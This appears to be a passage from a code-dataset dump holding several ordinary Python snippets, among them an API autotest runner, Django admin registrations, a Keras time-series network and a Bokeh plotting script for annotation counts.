_output.get('strict'):\n pass\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val'][\n 'type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, 'Not equal! \\n\\tExpect: {}\\n\\tGot: {}'.format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\n<mask token>\n",
"step-4": "from src.testcase.case import Case\nfrom src.utils import *\nfrom src.protocol.register import get_conn\nfrom src.precondition import *\n\n\nclass OneCase(object):\n \"\"\"\n Main flow of running one case's autotest\n \"\"\"\n PASS = True\n FAIL = False\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get(\n 'type')) for _ in func.get('args')}\n _func(**_args)\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n _output = step.get('output')\n if _output.get('strict'):\n pass\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val'][\n 'type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, 'Not equal! \\n\\tExpect: {}\\n\\tGot: {}'.format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.\n get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self.\n _step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\nif __name__ == '__main__':\n testcase = OneCase(\n '/Users/eacon/github/APIAutoTestFramework/case/sample.json')\n testcase.run()\n",
"step-5": "from src.testcase.case import Case\nfrom src.utils import *\nfrom src.protocol.register import get_conn\nfrom src.precondition import *\n\n\nclass OneCase(object):\n \"\"\"\n Main flow of running one case's autotest\n \"\"\"\n PASS = True\n FAIL = False\n\n def __init__(self, case_path, *args, **kwargs):\n self._case_path = str(case_path)\n self._case_dict = {}\n self._step_result = []\n self._step_msg = []\n self._passed = False\n\n def run(self):\n self.load_case(self._case_path)\n self.satisfy_precondition(self._case_dict)\n self.exec_steps(self._case_dict)\n self.save_result()\n\n def load_case(self, case_path):\n self._case_dict = Case(file_path=case_path).case_dict\n\n def satisfy_precondition(self, case_dict):\n pre = case_dict.get('precondition')\n if pre:\n # pre functions\n func_list = pre.get('prefunction')\n for func in func_list:\n _func = eval(func.get('func_name'))\n _args = {_.get('name'): trans_type(_.get('value'), _.get('type')) for _ in func.get('args')}\n _func(**_args)\n # dependency\n check_dependency(pre.get('dependency'))\n\n def check_dependency(self):\n pass # ToDo\n\n def exec_steps(self, case_dict):\n \"\"\"\n \"\"\"\n for step in case_dict.get('step'):\n # input\n _input = step.get('input')\n res = {}\n for protocol, _args in _input.iteritems():\n req = get_conn(protocol)(**_args)\n res = req.response\n # compare output\n _output = step.get('output')\n if _output.get('strict'):\n pass # ToDo\n try:\n for _ in _output.get('expect'):\n _var = _.get('var')\n _expect_value = trans_type(_['val']['value'], _['val']['type'])\n _real_value = res.get(_var)\n if _.get('cmp') == '==':\n assert _expect_value == _real_value, \"Not equal! \\n\\tExpect: {}\\n\\tGot: {}\".format(\n _expect_value, _real_value)\n except AssertionError as e:\n self._step_result.append(self.FAIL)\n self._step_msg.append(e.message)\n else:\n self._step_result.append(self.PASS)\n self._step_msg.append('Passed!')\n self._passed = all(self._step_result)\n\n def save_result(self):\n \"\"\"\n save result for this test\n 1) print to console\n 2) record to mysql\n 3) upload to testlink\n \"\"\"\n self.print_to_console()\n\n def print_to_console(self):\n if self._passed:\n print('All steps passed for case: {}'.format(self._case_dict.get('name')))\n else:\n err('Failed on case: {}'.format(self._case_dict.get('name')))\n step_length = range(1, len(self._step_result) + 1)\n for i, result, msg in zip(step_length, self._step_result, self._step_msg):\n if result == self.FAIL:\n err('Step {} failed for reason:\\n\\t{}'.format(i, msg))\n\n\nif __name__ == '__main__':\n testcase = OneCase('/Users/eacon/github/APIAutoTestFramework/case/sample.json')\n testcase.run()",
"step-ids": [
7,
9,
10,
13,
14
]
}
|
[
7,
9,
10,
13,
14
] |
from django.contrib import admin
from .models import Contactus,ContactusAdmin,Company,CompanyAdmin,Products,ProductsAdmin,Brands,BrandsAdmin
# Register your models here.
admin.site.register(Contactus,ContactusAdmin),
admin.site.register(Company,CompanyAdmin),
admin.site.register(Products,ProductsAdmin),
admin.site.register(Brands,BrandsAdmin),
|
normal
|
{
"blob_id": "9586dc118be4388491770d823a38e8068e3b91cb",
"index": 5960,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(Contactus, ContactusAdmin),\nadmin.site.register(Company, CompanyAdmin),\nadmin.site.register(Products, ProductsAdmin),\nadmin.site.register(Brands, BrandsAdmin),\n",
"step-3": "from django.contrib import admin\nfrom .models import Contactus, ContactusAdmin, Company, CompanyAdmin, Products, ProductsAdmin, Brands, BrandsAdmin\nadmin.site.register(Contactus, ContactusAdmin),\nadmin.site.register(Company, CompanyAdmin),\nadmin.site.register(Products, ProductsAdmin),\nadmin.site.register(Brands, BrandsAdmin),\n",
"step-4": "from django.contrib import admin\nfrom .models import Contactus,ContactusAdmin,Company,CompanyAdmin,Products,ProductsAdmin,Brands,BrandsAdmin\n# Register your models here.\n\nadmin.site.register(Contactus,ContactusAdmin),\nadmin.site.register(Company,CompanyAdmin),\nadmin.site.register(Products,ProductsAdmin),\nadmin.site.register(Brands,BrandsAdmin),",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('mgdata.dat.csv')
training_set = dataset.iloc[:1100, 1:2].values
X_train=[]
y_train=[]
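# Build sliding windows: each training sample uses the previous 20 values as input and the next value as the target.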
for i in range(20,1090):
X_train.append(training_set[i-20:i,0])
y_train.append(training_set[i,0])
X_train=np.asarray(X_train)
y_train=np.asarray(y_train)
import keras
from keras.models import Sequential
from keras.layers import Dense
# Initialising the ANN
classifier = Sequential()
# Adding the input layer and the first hidden layer
classifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu', input_dim = 20))
# Adding the second hidden layer
classifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))
# Adding the third hidden layer
classifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))
# Adding the output layer
classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'linear'))
# Compiling the ANN
classifier.compile(optimizer = 'adam', loss = 'mean_squared_error', metrics = [])
# Fitting the ANN to the Training set
history =classifier.fit(X_train, y_train, batch_size =8, nb_epoch = 60,validation_split=0.03)
dataset_test=dataset.iloc[1100:1110, 1:2].values
y_test=dataset.iloc[1100:1110, 1:2].values
dataset_test=pd.DataFrame(dataset_test)
dataset_train=pd.DataFrame(training_set)
dataset_total = pd.concat((dataset_train, dataset_test), axis = 0)
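# Keep the last 20 training values plus the 10 test values so every test sample has a full 20-step input window.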
inputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values
inputs = inputs.reshape(-1,1)
X_test = []
for i in range(20,30):
X_test.append(inputs[i-20:i, 0])
X_test = np.array(X_test)
predicted = classifier.predict(X_test)
# Visualising the results
plt.plot(y_test, color = 'red', label="real" )
plt.plot(predicted, color = 'blue', label="predicted")
plt.legend()
plt.show()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
|
normal
|
{
"blob_id": "28a3763715f5405f8abe2de17ed5f9df1019278b",
"index": 6878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(20, 1090):\n X_train.append(training_set[i - 20:i, 0])\n y_train.append(training_set[i, 0])\n<mask token>\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu',\n input_dim=20))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=1, init='uniform', activation='linear'))\nclassifier.compile(optimizer='adam', loss='mean_squared_error', metrics=[])\n<mask token>\nfor i in range(20, 30):\n X_test.append(inputs[i - 20:i, 0])\n<mask token>\nplt.plot(y_test, color='red', label='real')\nplt.plot(predicted, color='blue', label='predicted')\nplt.legend()\nplt.show()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n",
"step-3": "<mask token>\ndataset = pd.read_csv('mgdata.dat.csv')\ntraining_set = dataset.iloc[:1100, 1:2].values\nX_train = []\ny_train = []\nfor i in range(20, 1090):\n X_train.append(training_set[i - 20:i, 0])\n y_train.append(training_set[i, 0])\nX_train = np.asarray(X_train)\ny_train = np.asarray(y_train)\n<mask token>\nclassifier = Sequential()\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu',\n input_dim=20))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=1, init='uniform', activation='linear'))\nclassifier.compile(optimizer='adam', loss='mean_squared_error', metrics=[])\nhistory = classifier.fit(X_train, y_train, batch_size=8, nb_epoch=60,\n validation_split=0.03)\ndataset_test = dataset.iloc[1100:1110, 1:2].values\ny_test = dataset.iloc[1100:1110, 1:2].values\ndataset_test = pd.DataFrame(dataset_test)\ndataset_train = pd.DataFrame(training_set)\ndataset_total = pd.concat((dataset_train, dataset_test), axis=0)\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values\ninputs = inputs.reshape(-1, 1)\nX_test = []\nfor i in range(20, 30):\n X_test.append(inputs[i - 20:i, 0])\nX_test = np.array(X_test)\npredicted = classifier.predict(X_test)\nplt.plot(y_test, color='red', label='real')\nplt.plot(predicted, color='blue', label='predicted')\nplt.legend()\nplt.show()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\ndataset = pd.read_csv('mgdata.dat.csv')\ntraining_set = dataset.iloc[:1100, 1:2].values\nX_train = []\ny_train = []\nfor i in range(20, 1090):\n X_train.append(training_set[i - 20:i, 0])\n y_train.append(training_set[i, 0])\nX_train = np.asarray(X_train)\ny_train = np.asarray(y_train)\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nclassifier = Sequential()\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu',\n input_dim=20))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=35, init='uniform', activation='relu'))\nclassifier.add(Dense(output_dim=1, init='uniform', activation='linear'))\nclassifier.compile(optimizer='adam', loss='mean_squared_error', metrics=[])\nhistory = classifier.fit(X_train, y_train, batch_size=8, nb_epoch=60,\n validation_split=0.03)\ndataset_test = dataset.iloc[1100:1110, 1:2].values\ny_test = dataset.iloc[1100:1110, 1:2].values\ndataset_test = pd.DataFrame(dataset_test)\ndataset_train = pd.DataFrame(training_set)\ndataset_total = pd.concat((dataset_train, dataset_test), axis=0)\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values\ninputs = inputs.reshape(-1, 1)\nX_test = []\nfor i in range(20, 30):\n X_test.append(inputs[i - 20:i, 0])\nX_test = np.array(X_test)\npredicted = classifier.predict(X_test)\nplt.plot(y_test, color='red', label='real')\nplt.plot(predicted, color='blue', label='predicted')\nplt.legend()\nplt.show()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n",
"step-5": "\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\ndataset = pd.read_csv('mgdata.dat.csv')\r\ntraining_set = dataset.iloc[:1100, 1:2].values\r\n\r\nX_train=[]\r\ny_train=[]\r\nfor i in range(20,1090):\r\n X_train.append(training_set[i-20:i,0])\r\n y_train.append(training_set[i,0])\r\nX_train=np.asarray(X_train)\r\ny_train=np.asarray(y_train)\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n# Initialising the ANN\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu', input_dim = 20))\r\n\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))\r\n# Adding the third hidden layer\r\nclassifier.add(Dense(output_dim = 35, init = 'uniform', activation = 'relu'))\r\n\r\n# Adding the output layer\r\nclassifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'linear'))\r\n\r\n# Compiling the ANN\r\nclassifier.compile(optimizer = 'adam', loss = 'mean_squared_error', metrics = [])\r\n\r\n# Fitting the ANN to the Training set\r\nhistory =classifier.fit(X_train, y_train, batch_size =8, nb_epoch = 60,validation_split=0.03)\r\n\r\ndataset_test=dataset.iloc[1100:1110, 1:2].values\r\ny_test=dataset.iloc[1100:1110, 1:2].values\r\ndataset_test=pd.DataFrame(dataset_test)\r\ndataset_train=pd.DataFrame(training_set)\r\n\r\n\r\ndataset_total = pd.concat((dataset_train, dataset_test), axis = 0)\r\ninputs = dataset_total[len(dataset_total) - len(dataset_test) - 20:].values\r\n\r\n\r\ninputs = inputs.reshape(-1,1)\r\n\r\nX_test = []\r\nfor i in range(20,30):\r\n X_test.append(inputs[i-20:i, 0])\r\nX_test = np.array(X_test)\r\n\r\npredicted = classifier.predict(X_test)\r\n\r\n\r\n# Visualising the results\r\nplt.plot(y_test, color = 'red', label=\"real\" )\r\nplt.plot(predicted, color = 'blue', label=\"predicted\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'validation'], loc='upper left')\r\nplt.show()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
class Event(object):
def __init__(self):
self.id = None
self.raw = None
self.create_dt = datetime.datetime.now()
self.device_id = None
self.collector_id = None
self.device_hostname = None
self.device_domain_name = None
self.device_ip_address = None
self.types = []
def to_dict(self):
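        # Return only the attributes that have been set; None values are skipped.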
d = {}
for item in self.__dict__:
val = getattr(self, item)
if val != None:
d[item] = val
return d
|
normal
|
{
"blob_id": "7554b00f8c4d40f1d3ee2341f118048ca7ad10ea",
"index": 709,
"step-1": "<mask token>\n\n\nclass Event(object):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Event(object):\n <mask token>\n\n def to_dict(self):\n d = {}\n for item in self.__dict__:\n val = getattr(self, item)\n if val != None:\n d[item] = val\n return d\n",
"step-3": "<mask token>\n\n\nclass Event(object):\n\n def __init__(self):\n self.id = None\n self.raw = None\n self.create_dt = datetime.datetime.now()\n self.device_id = None\n self.collector_id = None\n self.device_hostname = None\n self.device_domain_name = None\n self.device_ip_address = None\n self.types = []\n\n def to_dict(self):\n d = {}\n for item in self.__dict__:\n val = getattr(self, item)\n if val != None:\n d[item] = val\n return d\n",
"step-4": "import datetime\n\n\nclass Event(object):\n\n def __init__(self):\n self.id = None\n self.raw = None\n self.create_dt = datetime.datetime.now()\n self.device_id = None\n self.collector_id = None\n self.device_hostname = None\n self.device_domain_name = None\n self.device_ip_address = None\n self.types = []\n\n def to_dict(self):\n d = {}\n for item in self.__dict__:\n val = getattr(self, item)\n if val != None:\n d[item] = val\n return d\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
import json
from bokeh.plotting import figure, output_file
from bokeh.io import show
from bokeh.palettes import inferno
from bokeh.models import ColumnDataSource, FactorRange
from bokeh.transform import factor_cmap
from bokeh.models import HoverTool
# from bokeh.io import export_svgs
def read_summary(summary_file):
return json.loads(open(summary_file, "r").read())
def get_descriptions(summary):
d = {}
for o in summary["ontology_events"]:
print(o)
d[o] = summary["ontology_events"][o].get(
'description', summary["ontology_events"][o]['method']) + '_' + str(o)
return(d)
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [],
'rxns': [],
'terms': []}
# genes
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
# terms
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
# rxns
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
# sums
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events,
'genes': gene_counts,
'terms': term_counts,
'rxns': rxn_counts
}
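    # Build (event, type) factor pairs so the genes/terms/rxns bars are grouped under each annotation event.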
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x),
plot_height=400,
plot_width=1000,
title="Unique Counts per Annotation Event",
tools="wheel_zoom,box_zoom,reset,save")
p.hbar(y='x',
right='counts',
height=0.9,
source=source,
line_color="black",
fill_color=factor_cmap('x',
palette=inferno(len(types)),
factors=types,
start=1,
end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = "horizontal"
p.yaxis.subgroup_label_orientation = "horizontal"
p.yaxis.group_label_orientation = "horizontal"
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = "12pt"
p.yaxis.major_label_text_font_size = "12pt"
p.yaxis.group_text_font_size = "12pt"
p.add_tools(HoverTool(tooltips=[("Type", "@x"), ("Count", "@counts")]))
return(p)
#summary = read_summary("PT19DW.5.json")
summary = read_summary("PT19DW.7.json")
output_file("totals.html", title="Totals")
totals = plot_totals(summary)
show(totals)
|
normal
|
{
"blob_id": "7036ae5f74e6cb04518c20bb52122a1dfae76f23",
"index": 712,
"step-1": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\n<mask token>\noutput_file('totals.html', title='Totals')\n<mask token>\nshow(totals)\n",
"step-3": "<mask token>\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = plot_totals(summary)\nshow(totals)\n",
"step-4": "import json\nfrom bokeh.plotting import figure, output_file\nfrom bokeh.io import show\nfrom bokeh.palettes import inferno\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.transform import factor_cmap\nfrom bokeh.models import HoverTool\n\n\ndef read_summary(summary_file):\n return json.loads(open(summary_file, 'r').read())\n\n\ndef get_descriptions(summary):\n d = {}\n for o in summary['ontology_events']:\n print(o)\n d[o] = summary['ontology_events'][o].get('description', summary[\n 'ontology_events'][o]['method']) + '_' + str(o)\n return d\n\n\ndef plot_totals(summary):\n descriptions = get_descriptions(summary)\n totals = {}\n for event in summary['ontology_events'].keys():\n totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}\n for gene in summary['genes']:\n for term in summary['genes'][gene]['terms']:\n for event in summary['genes'][gene]['terms'][term]:\n totals[str(event)]['genes'].append(gene)\n for term in summary['terms']:\n for event in summary['terms'][term]:\n totals[str(event)]['terms'].append(term)\n for rxn in summary['rxns']:\n for event in summary['rxns'][rxn]:\n totals[str(event)]['rxns'].append(rxn)\n events = []\n types = ['genes', 'terms', 'rxns']\n gene_counts = []\n rxn_counts = []\n term_counts = []\n for event in totals:\n events.append(descriptions[event])\n gene_counts.append(len(set(totals[event]['genes'])))\n rxn_counts.append(len(set(totals[event]['rxns'])))\n term_counts.append(len(set(totals[event]['terms'])))\n data = {'events': events, 'genes': gene_counts, 'terms': term_counts,\n 'rxns': rxn_counts}\n x = [(event, type) for event in events for type in types]\n counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())\n source = ColumnDataSource(data=dict(x=x, counts=counts))\n p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,\n title='Unique Counts per Annotation Event', tools=\n 'wheel_zoom,box_zoom,reset,save')\n p.hbar(y='x', right='counts', height=0.9, source=source, line_color=\n 'black', fill_color=factor_cmap('x', palette=inferno(len(types)),\n factors=types, start=1, end=2))\n p.x_range.start = 0\n p.y_range.range_padding = 0.1\n p.yaxis.major_label_orientation = 'horizontal'\n p.yaxis.subgroup_label_orientation = 'horizontal'\n p.yaxis.group_label_orientation = 'horizontal'\n p.ygrid.grid_line_color = None\n p.title.text_font_size = '12pt'\n p.xaxis.major_label_text_font_size = '12pt'\n p.yaxis.major_label_text_font_size = '12pt'\n p.yaxis.group_text_font_size = '12pt'\n p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))\n return p\n\n\nsummary = read_summary('PT19DW.7.json')\noutput_file('totals.html', title='Totals')\ntotals = 